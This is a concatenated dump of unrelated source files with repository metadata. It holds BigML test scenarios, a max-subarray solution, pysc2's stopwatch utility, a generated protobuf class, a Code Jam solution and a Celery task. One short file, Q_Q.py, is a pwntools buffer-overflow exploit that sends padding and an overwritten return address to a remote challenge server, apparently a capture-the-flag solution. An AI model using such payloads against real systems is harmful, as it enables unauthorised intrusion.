print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
cluster_create.i_create_a_cluster(self)
cluster_create.the_cluster_is_finished_in_less_than(self, example[3])
cluster_create.i_export_cluster(self, example[4])
cluster_create.i_create_local_cluster_from_file(self, example[4])
cluster_create.check_cluster_id_local_id(self)
def test_scenario6(self):
"""
Scenario 6: Successfully creating a local anomaly from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an anomaly
And I wait until the anomaly is ready less than <time_3> secs
And I export the anomaly to "<exported_file>"
When I create a local anomaly from the file "<exported_file>"
Then the anomaly ID and the local anomaly ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/iris.csv | 10 | 10 | 500 | ./tmp/anomaly.json
"""
print(self.test_scenario6.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/anomaly.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
anomaly_create.i_create_an_anomaly(self)
anomaly_create.the_anomaly_is_finished_in_less_than(self, example[3])
anomaly_create.i_export_anomaly(self, example[4])
anomaly_create.i_create_local_anomaly_from_file(self, example[4])
anomaly_create.check_anomaly_id_local_id(self)
def test_scenario7(self):
"""
Scenario 7: Successfully creating a local association from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an association
And I wait until the association is ready less than <time_3> secs
And I export the association to "<exported_file>"
When I create a local association from the file "<exported_file>"
Then the association ID and the local association ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/iris.csv | 10 | 10 | 500 | ./tmp/association.json
"""
print(self.test_scenario7.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/association.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
association_create.i_create_an_association_from_dataset(self)
association_create.the_association_is_finished_in_less_than(self, example[3])
association_create.i_export_association(self, example[4])
association_create.i_create_local_association_from_file(self, example[4])
association_create.check_association_id_local_id(self)
def test_scenario8(self):
"""
Scenario 8: Successfully creating a local topic model from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a topic model
And I wait until the topic model is ready less than <time_3> secs
And I export the topic model to "<exported_file>"
When I create a local topic model from the file "<exported_file>"
Then the topic model ID and the local topic model ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/spam.csv | 10 | 10 | 500 | ./tmp/topic_model.json
"""
print(self.test_scenario8.__doc__)
examples = [
['data/spam.csv', '10', '10', '500', './tmp/topic_model.json', '{"fields": {"000001": {"optype": "text", "term_analysis": {"case_sensitive": true, "stem_words": true, "use_stopwords": false, "language": "en"}}}}']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
source_create.i_update_source_with(self, example[5])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
topic_create.i_create_a_topic_model(self)
topic_create.the_topic_model_is_finished_in_less_than(self, example[3])
topic_create.i_export_topic_model(self, example[4])
topic_create.i_create_local_topic_model_from_file(self, example[4])
topic_create.check_topic_model_id_local_id(self)
def test_scenario9(self):
"""
        Scenario 9: Successfully creating a local time series from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a time series
And I wait until the time series is ready less than <time_3> secs
And I export the time series to "<exported_file>"
When I create a local time series from the file "<exported_file>"
Then the time series ID and the local time series ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/iris.csv | 10 | 10 | 500 | ./tmp/time_series.json
"""
print(self.test_scenario9.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/time_series.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
timeseries_create.i_create_a_time_series(self)
timeseries_create.the_time_series_is_finished_in_less_than(self, example[3])
timeseries_create.i_export_time_series(self, example[4])
timeseries_create.i_create_local_time_series_from_file(self, example[4])
timeseries_create.check_time_series_id_local_id(self)
def test_scenario10(self):
"""
Scenario 10: Successfully creating a local fusion from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I retrieve a list of remote models tagged with "<tag>"
And I create a fusion from a list of models
And I wait until the fusion is ready less than <time_3> secs
And I export the fusion to "<exported_file>"
When I create a local fusion from the file "<exported_file>"
Then the fusion ID and the local fusion ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file | params | tag
            | ../data/iris.csv | 10 | 10 | 50 | ./tmp/fusion.json | {"tags": ["my_fusion_tag"]} | my_fusion_tag
"""
print(self.test_scenario10.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/fusion.json', 'my_fusion_tag']]
for example in examples:
print("\nTesting with:\n", example)
tag = example[5]
tag_args = '{"tags":["%s"]}' % tag
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
prediction_compare.i_retrieve_a_list_of_remote_models(self, tag)
model_create.i_create_a_fusion(self)
model_create.the_fusion_is_finished_in_less_than(self, example[3])
model_create.i_export_fusion(self, example[4])
model_create.i_create_local_fusion_from_file(self, example[4])
model_create.check_fusion_id_local_id(self)
def test_scenario11(self):
"""
Scenario 11: Successfully creating a local linear regression from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a linear regression
And I wait until the linear regression is ready less than <time_3> secs
And I export the linear regression to "<exported_file>"
When I create a local linear regression from the file "<exported_file>"
Then the linear regression ID and the local linear regression ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/grades.csv | 20 | 20 | 50 | ./tmp/linear.json
"""
print(self.test_scenario11.__doc__)
examples = [
['data/grades.csv', '20', '20', '50', './tmp/linear.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
linear_create.i_create_a_linear_regression_from_dataset(self)
linear_create.the_linear_regression_is_finished_in_less_than(self, example[3])
model_create.i_export_linear_regression(self, example[4])
model_create.i_create_local_linear_regression_from_file(self, example[4])
model_create.check_linear_regression_id_local_id(self)
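# A minimal usage sketch of what these scenarios exercise: once a model has
# been exported (e.g. scenario 1's ./tmp/model.json), the bindings can rebuild
# it locally straight from that file. Paths and inputs here are illustrative.
if __name__ == "__main__":
    from bigml.model import Model
    local_model = Model("./tmp/model.json")
    print(local_model.predict({"petal length": 2.5, "petal width": 0.5}))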
| [
"[email protected]"
] | |
823128232096e5a64b6c166ca62a3b471935bf31 | 4d01bd8003ac64b2a688db12108b472387c999c4 | /Q_Q.py | a27e43ccf178755bb31aa68761a4fffd6c588111 | [] | no_license | BlackHat-S/PWN | 2ef6aa7db3baafe009ac31631bdaffaf043f3b85 | cde1f9ee3258aa56c2634995d5baec14b500a399 | refs/heads/master | 2021-01-07T00:44:20.208899 | 2020-03-21T04:16:14 | 2020-03-21T04:29:47 | 241,529,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from pwn import *
#p=process('./Q_Q')
p=remote('121.40.92.129',28022)
#gdb.attach(p)
s2='you\x11need"pwntools!3'  # stage-1 input; its bytes line up with the little-endian dword checks hinted at by the commented p32() values below
#s2=p32(0x11756F79)
#s2=p32(0x6e11756f)
p.sendline(s2)
payload='a'*19+p32(0x8181B1B)  # 19 bytes of padding, then the 32-bit little-endian address 0x08181B1B
p.sendline(payload)
p.interactive()
| [
"[email protected]"
] | |
39763dada35168638ae5e1e8b7ec0faa6847b5ba | 0775a2175ddc9f41b4f7637a388623ca9ef15259 | /chap8/16.子数组的最大累加和问题/16_maxSubArray.py | fb63c569d4ab173bbb1254567316ee40c6b6c431 | [] | no_license | huang-jingwei/Coding-Interview-Guide | 6839876457b3cf01a08c5623463e66fe9efa7416 | a42f45213c94d529f69a61f0bda92eddfe5bdfea | refs/heads/master | 2023-04-16T20:05:40.615475 | 2021-05-05T03:32:25 | 2021-05-05T03:32:25 | 286,343,194 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | from typing import List  # needed for the List[int] annotation below
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
        if len(nums) == 1:  # only one element
return nums[0]
maxSubArraySum = [0] * len(nums)
for index in range(len(maxSubArraySum)):
if index == 0:
maxSubArraySum[index] = nums[index]
elif index > 0:
if maxSubArraySum[index - 1] >= 0:
maxSubArraySum[index] = maxSubArraySum[index - 1] + nums[index]
else:
maxSubArraySum[index] = nums[index]
return max(maxSubArraySum) | [
"[email protected]"
] | |
1801f478f73579ae23ce3d61b2ed1d64b5c7e40f | 1cc8604dff9713d3879599f1876a6ea313ebe1fb | /pysc2/lib/stopwatch.py | 6c4202c859716afb77ef1155c82b1955ffcfd8d1 | [
"Apache-2.0"
] | permissive | SoyGema/pysc2 | c363ec768ebf94e7b0fa08e136b36b7432ae1b44 | e5de62023ec45ac212016b5404dd73272109d9d4 | refs/heads/master | 2022-02-08T21:41:46.530129 | 2022-01-29T13:11:15 | 2022-01-29T13:11:15 | 143,897,552 | 1 | 0 | Apache-2.0 | 2018-08-07T16:06:23 | 2018-08-07T16:06:22 | null | UTF-8 | Python | false | false | 7,935 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A stopwatch to check how much time is used by bits of code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import os
import sys
import threading
import time
from future.builtins import range # pylint: disable=redefined-builtin
import six
class Stat(object):
"""A set of statistics about a single value series."""
__slots__ = ("num", "min", "max", "sum", "sum_sq")
def __init__(self):
self.reset()
def reset(self):
self.num = 0
self.min = 1000000000
self.max = 0
self.sum = 0
self.sum_sq = 0
def add(self, val):
self.num += 1
if self.min > val:
self.min = val
if self.max < val:
self.max = val
self.sum += val
self.sum_sq += val**2
@property
def avg(self):
return 0 if self.num == 0 else self.sum / self.num
@property
def dev(self):
"""Standard deviation."""
if self.num == 0:
return 0
return math.sqrt(max(0, self.sum_sq / self.num - (self.sum / self.num)**2))
def merge(self, other):
self.num += other.num
self.min = min(self.min, other.min)
self.max = max(self.max, other.max)
self.sum += other.sum
self.sum_sq += other.sum_sq
@staticmethod
def build(summation, average, standard_deviation, minimum, maximum, number):
stat = Stat()
if number > 0:
stat.num = number
stat.min = minimum
stat.max = maximum
stat.sum = summation
stat.sum_sq = number * (standard_deviation**2 + average**2)
return stat
@staticmethod
def parse(s):
if s == "num=0":
return Stat()
parts = (float(p.split(":")[1]) for p in s.split(", "))
return Stat.build(*parts)
def __str__(self):
if self.num == 0:
return "num=0"
return "sum: %.4f, avg: %.4f, dev: %.4f, min: %.4f, max: %.4f, num: %d" % (
self.sum, self.avg, self.dev, self.min, self.max, self.num)
class StopWatchContext(object):
"""Time an individual call."""
__slots__ = ("_sw", "_start")
def __init__(self, stopwatch, name):
self._sw = stopwatch
self._sw.push(name)
def __enter__(self):
self._start = time.time()
def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):
self._sw.add(self._sw.pop(), time.time() - self._start)
class TracingStopWatchContext(StopWatchContext):
"""Time an individual call, but also output all the enter/exit calls."""
def __enter__(self):
super(TracingStopWatchContext, self).__enter__()
self._log(">>> %s" % self._sw.cur_stack())
def __exit__(self, *args, **kwargs):
self._log("<<< %s: %.6f secs" % (self._sw.cur_stack(),
time.time() - self._start))
super(TracingStopWatchContext, self).__exit__(*args, **kwargs)
def _log(self, s):
print(s, file=sys.stderr)
class FakeStopWatchContext(object):
"""A fake stopwatch context for when the stopwatch is too slow or unneeded."""
__slots__ = ()
def __enter__(self):
pass
def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):
pass
fake_context = FakeStopWatchContext()
class StopWatch(object):
"""A context manager that tracks call count and latency, and other stats.
Usage:
sw = stopwatch.Stopwatch()
with sw("foo"):
foo()
with sw("bar"):
bar()
@sw.decorate
def func():
pass
func()
print(sw)
"""
__slots__ = ("_times", "_local", "_factory")
def __init__(self, enabled=True, trace=False):
self._times = collections.defaultdict(Stat)
self._local = threading.local()
if trace:
self.trace()
elif enabled:
self.enable()
else:
self.disable()
def disable(self):
self._factory = lambda _: fake_context
def enable(self):
self._factory = lambda name: StopWatchContext(self, name)
def trace(self):
self._factory = lambda name: TracingStopWatchContext(self, name)
def custom(self, factory):
self._factory = factory
def __call__(self, name):
return self._factory(name)
def decorate(self, name_or_func):
"""Decorate a function/method to check its timings.
To use the function's name:
@sw.decorate
def func():
pass
To name it explicitly:
@sw.decorate("name")
def random_func_name():
pass
Args:
name_or_func: the name or the function to decorate.
Returns:
If a name is passed, returns this as a decorator, otherwise returns the
decorated function.
"""
if os.environ.get("SC2_NO_STOPWATCH"):
return name_or_func if callable(name_or_func) else lambda func: func
def decorator(name, func):
@functools.wraps(func)
def _stopwatch(*args, **kwargs):
with self(name):
return func(*args, **kwargs)
return _stopwatch
if callable(name_or_func):
return decorator(name_or_func.__name__, name_or_func)
else:
return lambda func: decorator(name_or_func, func)
def push(self, name):
try:
self._local.stack.append(name)
except AttributeError:
# Using an exception is faster than using hasattr.
self._local.stack = [name]
def pop(self):
stack = self._local.stack
ret = ".".join(stack)
stack.pop()
return ret
def cur_stack(self):
return ".".join(self._local.stack)
def clear(self):
self._times.clear()
def add(self, name, duration):
self._times[name].add(duration)
def __getitem__(self, name):
return self._times[name]
@property
def times(self):
return self._times
def merge(self, other):
for k, v in six.iteritems(other.times):
self._times[k].merge(v)
@staticmethod
def parse(s):
"""Parse the output below to create a new StopWatch."""
stopwatch = StopWatch()
for line in s.splitlines():
if line.strip():
parts = line.split(None)
name = parts[0]
if name != "%": # ie not the header line
rest = (float(v) for v in parts[2:])
stopwatch.times[parts[0]].merge(Stat.build(*rest))
return stopwatch
def str(self, threshold=0.1):
"""Return a string representation of the timings."""
if not self._times:
return ""
total = sum(s.sum for k, s in six.iteritems(self._times) if "." not in k)
table = [["", "% total", "sum", "avg", "dev", "min", "max", "num"]]
for k, v in sorted(self._times.items()):
percent = 100 * v.sum / (total or 1)
if percent > threshold: # ignore anything below the threshold
table.append([
k,
"%.2f%%" % percent,
"%.4f" % v.sum,
"%.4f" % v.avg,
"%.4f" % v.dev,
"%.4f" % v.min,
"%.4f" % v.max,
"%d" % v.num,
])
col_widths = [max(len(row[i]) for row in table)
for i in range(len(table[0]))]
out = ""
for row in table:
out += " " + row[0].ljust(col_widths[0]) + " "
out += " ".join(
val.rjust(width) for val, width in zip(row[1:], col_widths[1:]))
out += "\n"
return out
def __str__(self):
return self.str()
# Global stopwatch is disabled by default to not incur the performance hit if
# it's not wanted.
sw = StopWatch(enabled=False)
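# A small demo of the API described in the StopWatch docstring. The module
# default `sw` above stays disabled, so this builds its own enabled instance.
if __name__ == "__main__":
    demo_sw = StopWatch(enabled=True)
    @demo_sw.decorate("busy")
    def busy():
        with demo_sw("inner"):  # nests as "busy.inner" in the stats table
            time.sleep(0.01)
    for _ in range(3):
        busy()
    print(demo_sw)  # renders the stats table built by StopWatch.str()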
| [
"[email protected]"
] | |
ea06394e335fad81afcb39da877df9cf15fbc2d3 | bc441bb06b8948288f110af63feda4e798f30225 | /translate_sdk/model/ops_automation/job_tasks_pb2.py | c0f92286f95c90cdfcca776560baf3bce86aceeb | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 10,518 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: job_tasks.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from translate_sdk.model.ops_automation import mail_info_pb2 as translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='job_tasks.proto',
package='ops_automation',
syntax='proto3',
serialized_options=_b('ZHgo.easyops.local/contracts/protorepo-models/easyops/model/ops_automation'),
serialized_pb=_b('\n\x0fjob_tasks.proto\x12\x0eops_automation\x1a\x32translate_sdk/model/ops_automation/mail_info.proto\"\x82\x03\n\x08JobTasks\x12\n\n\x02id\x18\x01 \x01(\t\x12\r\n\x05jobId\x18\x02 \x01(\t\x12\x0f\n\x07jobName\x18\x03 \x01(\t\x12\x10\n\x08menuName\x18\x04 \x01(\t\x12\x0e\n\x06\x65xecId\x18\x05 \x01(\t\x12\x14\n\x0cresourceType\x18\x06 \x01(\t\x12\x12\n\nresourceId\x18\x07 \x01(\t\x12\x13\n\x0bresourceVId\x18\x08 \x01(\t\x12\x15\n\rresourceVName\x18\t \x01(\t\x12\x0f\n\x07trigger\x18\n \x01(\t\x12\x10\n\x08\x65xecUser\x18\x0b \x01(\t\x12\r\n\x05hosts\x18\x0c \x03(\t\x12\x0e\n\x06status\x18\r \x01(\t\x12&\n\x04mail\x18\x0e \x01(\x0b\x32\x18.ops_automation.MailInfo\x12\x13\n\x0bsuccessRate\x18\x0f \x01(\x02\x12\r\n\x05\x65rror\x18\x10 \x01(\t\x12\x12\n\ncreateTime\x18\x11 \x01(\t\x12\x12\n\nupdateTime\x18\x12 \x01(\t\x12\x0f\n\x07\x63reator\x18\x13 \x01(\t\x12\x0b\n\x03org\x18\x14 \x01(\x05\x42JZHgo.easyops.local/contracts/protorepo-models/easyops/model/ops_automationb\x06proto3')
,
dependencies=[translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2.DESCRIPTOR,])
_JOBTASKS = _descriptor.Descriptor(
name='JobTasks',
full_name='ops_automation.JobTasks',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ops_automation.JobTasks.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jobId', full_name='ops_automation.JobTasks.jobId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jobName', full_name='ops_automation.JobTasks.jobName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='menuName', full_name='ops_automation.JobTasks.menuName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='execId', full_name='ops_automation.JobTasks.execId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceType', full_name='ops_automation.JobTasks.resourceType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceId', full_name='ops_automation.JobTasks.resourceId', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceVId', full_name='ops_automation.JobTasks.resourceVId', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceVName', full_name='ops_automation.JobTasks.resourceVName', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trigger', full_name='ops_automation.JobTasks.trigger', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='execUser', full_name='ops_automation.JobTasks.execUser', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hosts', full_name='ops_automation.JobTasks.hosts', index=11,
number=12, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='ops_automation.JobTasks.status', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mail', full_name='ops_automation.JobTasks.mail', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='successRate', full_name='ops_automation.JobTasks.successRate', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='ops_automation.JobTasks.error', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='createTime', full_name='ops_automation.JobTasks.createTime', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='updateTime', full_name='ops_automation.JobTasks.updateTime', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='ops_automation.JobTasks.creator', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='org', full_name='ops_automation.JobTasks.org', index=19,
number=20, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=88,
serialized_end=474,
)
_JOBTASKS.fields_by_name['mail'].message_type = translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2._MAILINFO
DESCRIPTOR.message_types_by_name['JobTasks'] = _JOBTASKS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
JobTasks = _reflection.GeneratedProtocolMessageType('JobTasks', (_message.Message,), {
'DESCRIPTOR' : _JOBTASKS,
'__module__' : 'job_tasks_pb2'
# @@protoc_insertion_point(class_scope:ops_automation.JobTasks)
})
_sym_db.RegisterMessage(JobTasks)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
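# Usage sketch for this generated module (field values are illustrative):
if __name__ == "__main__":
    task = JobTasks(jobId="job-1", jobName="nightly-sync", status="running")
    task.hosts.extend(["10.0.0.1", "10.0.0.2"])
    data = task.SerializeToString()   # wire-format bytes
    parsed = JobTasks()
    parsed.ParseFromString(data)      # round-trips back into a message
    print("%s -> %s" % (parsed.jobName, list(parsed.hosts)))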
| [
"[email protected]"
] | |
8ea422ab7d7637a015b6fe31a0e25db3f3cae371 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_75/561.py | 36d9557ad1663cf9120d0f6c51352667ae7b8581 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | import sys
import re
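# Appears to implement "Magicka"-style rules: adjacent pairs listed in CS
# combine into a single element, while opposed pairs in DS wipe the whole
# element list when both occur. Run against a contest input on stdin, e.g.:
#     python 561.py < input.txt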
input = sys.stdin
T=int(input.readline())
for i in xrange(1,T+1):
data = input.readline()
data = data.split()
C = int(data[0])
cs = data[1:1+C]
CS = {}
for s in cs:
CS["%s%s" % (s[0], s[1])] = s[2]
CS["%s%s" % (s[1], s[0])] = s[2]
D = int(data[1+C])
ds = data[1+C+1:1+C+1+D]
DS = {}
for s in ds:
DS[s[0]] = s[1]
DS[s[1]] = s[0]
N = int(data[1+C+1+D])
ns = data[1+C+1+D+1:]
S = ns[0] # one string
res = []
opposite = None
pair = None
for s in S:
if len(res):
k1 = "%s%s" % (res[-1], s)
if k1 in CS:
res[-1] = CS[k1]
continue
if s in DS:
if DS[s] in res:
# res = res[0:res.index(DS[s])]
res = []
continue
res.append(s)
# print data
# print C, cs, CS
# print D, ds, DS
# print N, ns
print re.sub("'", '', "Case #%s: %s" % (i, res))
| [
"[email protected]"
] | |
01a2e6b7af0a367e62438e4d324ed24336970776 | 9c1b28d9564cfde450f6590031ede667650d494f | /player/tasks.py | ade314e4fae37740ac46ba2df18ee15c5805a719 | [] | no_license | gdmurray/rankedgg-backend | 90f887f4d64ca5a38741ac8e9482f08fc5d6fd7e | ac312750a09a70907fe3e5a9ae9e1172c5e341d8 | refs/heads/master | 2022-12-18T16:54:27.302293 | 2019-03-24T05:24:23 | 2019-03-24T05:24:23 | 177,320,244 | 0 | 0 | null | 2022-12-08T04:54:05 | 2019-03-23T17:36:14 | Python | UTF-8 | Python | false | false | 746 | py | from ranked.celery import app
from .models import Player
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
@app.task
def update_ranked_data(pk, region=None):
player = Player.objects.get(id=pk)
print(f"Updating Ranked Data for {player.username}")
metadata, updated_player = player.fetch_metadata(include_player=True)
    from .serializers import PlayerLeaderBoardSerializer  # deferred import, presumably to avoid a circular dependency
